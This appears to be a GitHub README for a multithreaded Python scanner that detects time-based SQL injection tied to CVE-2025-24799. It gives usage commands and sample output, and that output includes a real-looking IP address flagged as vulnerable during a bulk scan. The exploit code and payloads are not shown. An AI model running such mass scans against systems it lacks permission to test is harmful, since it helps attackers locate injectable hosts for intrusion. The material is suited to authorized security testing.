A fast SQL injection vulnerability scanner built with Python. Uses time-based SQLi detection with multithreading and colorful output, designed for testing CVE-2025-24799 vulnerabilities.
- Scans single URLs or lists from files
- Shows vulnerable URLs live as they're found
- Multithreaded for speed
- Colorful CLI output
- Option to save results
-
Clone the repo:
git clone https://github.com/MuhammadWaseem29/CVE-2025-24799.git cd CVE-2025-24799 -
Install required packages:
pip install requests colorama
Run with Python 3:
python3 exploit.py -u http://example.comOutput:
[VULN] http://example.com/index.php/ajax/ - Delay: 7.40s
python3 exploit.py -f urls.txt -t 15Output:
Scanning: 100/1000 (10.0%)
[VULN] http://example.com/index.php/ajax/ - Delay: 7.10s
python3 exploit.py -f urls.txt -o results.txt -t 10Output:
Scanning: 50/500 (10.0%)
[VULN] http://test.com/index.php/ajax/ - Delay: 7.20s
[+] Results saved to results.txt
Validate via curl
-u <URL>: Single URL to scan-f <FILE>: File with URLs (one per line)-o <FILE>: Save results to file-t <NUM>: Number of threads (default: 10)
╔════════════════════════════╗
║ Noob-Wasi SQLi Scanner ║
║ Coded by: Noob-Wasi ║
║ Version: 1.0 ║
╚════════════════════════════╝
Starting SQL injection scan...
Scanning: 200/3494 (5.7%)
[VULN] http://152.67.42.99/index.php/ajax/ - Delay: 7.40s
Scanning: 745/3494 (21.3%)
Scan completed!
- Requires Python 3.x
- Test only on systems you have permission to scan
- Adjust threads (
-t) based on your system/network
Author: Noob-Wasi
GitHub: github.com/MuhammadWaseem29